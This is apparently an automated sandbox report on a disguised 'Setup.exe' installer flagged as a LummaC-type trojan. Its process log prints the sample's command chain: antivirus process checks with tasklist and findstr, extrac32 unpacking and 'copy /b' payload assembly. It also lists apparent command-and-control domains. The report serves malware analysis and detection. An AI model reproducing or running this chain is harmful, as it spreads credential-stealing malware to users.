      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00647DBA12_2_00647DBA
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00641FE712_2_00641FE7
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\280366\Hc.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: String function: 0063FD52 appears 40 times
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: String function: 00640DA0 appears 46 times
      Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 004062CF appears 58 times
      Source: Setup.exeStatic PE information: invalid certificate
      Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal88.troj.evad.winEXE@24/24@2/1
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006941FA GetLastError,FormatMessageW,12_2_006941FA
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00682010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_00682010
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00681A0B AdjustTokenPrivileges,CloseHandle,12_2_00681A0B
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0068DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_0068DD87
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00693A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,12_2_00693A0E
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
      Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsj8DEF.tmpJump to behavior
      Source: Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
      Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 280366
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Agrees
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Travels" Served
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems I
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\280366\Hc.com Hc.com I
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 280366Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E AgreesJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Travels" Served Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems IJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\280366\Hc.com Hc.com IJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Setup.exeStatic file information: File size 73409696 > 1048576
      Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006702D8 push cs; retn 0066h12_2_00670318
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00640DE6 push ecx; ret 12_2_00640DF9
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0063DC7C push AA0067CFh; iretd 12_2_0063DC87

      Persistence and Installation Behavior

      barindex
      Drops PE files with a suspicious file extension
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\280366\Hc.comJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\280366\Hc.comJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006B26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_006B26DD
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0063FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_0063FC7C
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comAPI coverage: 3.9 %
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com TID: 6396Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0068DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0068DC54
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0069A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0069A087
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0069A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0069A1E2
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0068E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_0068E472
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0069A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_0069A570
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0065C622 FindFirstFileExW,12_2_0065C622
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006966DC FindFirstFileW,FindNextFileW,FindClose,12_2_006966DC
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00697333 FindFirstFileW,FindClose,12_2_00697333
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_006973D4
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0068D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0068D921
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00625FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00625FC8
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\280366Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\280366\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: Hc.com, 0000000C.00000002.2352426923.0000000001901000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Hc.com, 0000000C.00000002.2352426923.0000000001861000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@L
      Source: Hc.com, 0000000C.00000002.2352426923.00000000018D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF9B7082F5FCBF7C7AD725550C42B03151488B7A41E4476B996F1BC08E627004835A415B7F458AF9D724590BBCFA02FA0A1B4243675BA7B1F64AC3E5898BA32136D44DC516585EA954F8C8905C53C74CA096789965ED30B20B702D50830D1ABE15EFC3F826AB7C6945D7F4CB4C2D8BA5C494FF53377CCAA32F4F6CB5E7CD6434C1B66B6760CC8332583F8DFDA050F4364F7BF46747BAE908235D19255A41268D5E07743B36D4E29FD784ECC59B2DA16C0C57AC809EC826F9068C77DBF35C9B9CF784DB06980F611BCDE4C26F7F3E0E1D69BA88651
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0069F4FF BlockInput,12_2_0069F4FF
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_0062338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_0062338B
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00645058 mov eax, dword ptr fs:[00000030h]12_2_00645058
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_006820AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,12_2_006820AA
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00652992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00652992
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00640BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00640BAF
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00640D45 SetUnhandledExceptionFilter,12_2_00640D45
      Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 12_2_00640F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00640F91

      HIPS / PFW / Operating System Protection Evasion

      barindex
      LummaC encrypted strings found
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
      Source: Hc.com, 0000000C.00000002.2353776475.0000000003FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
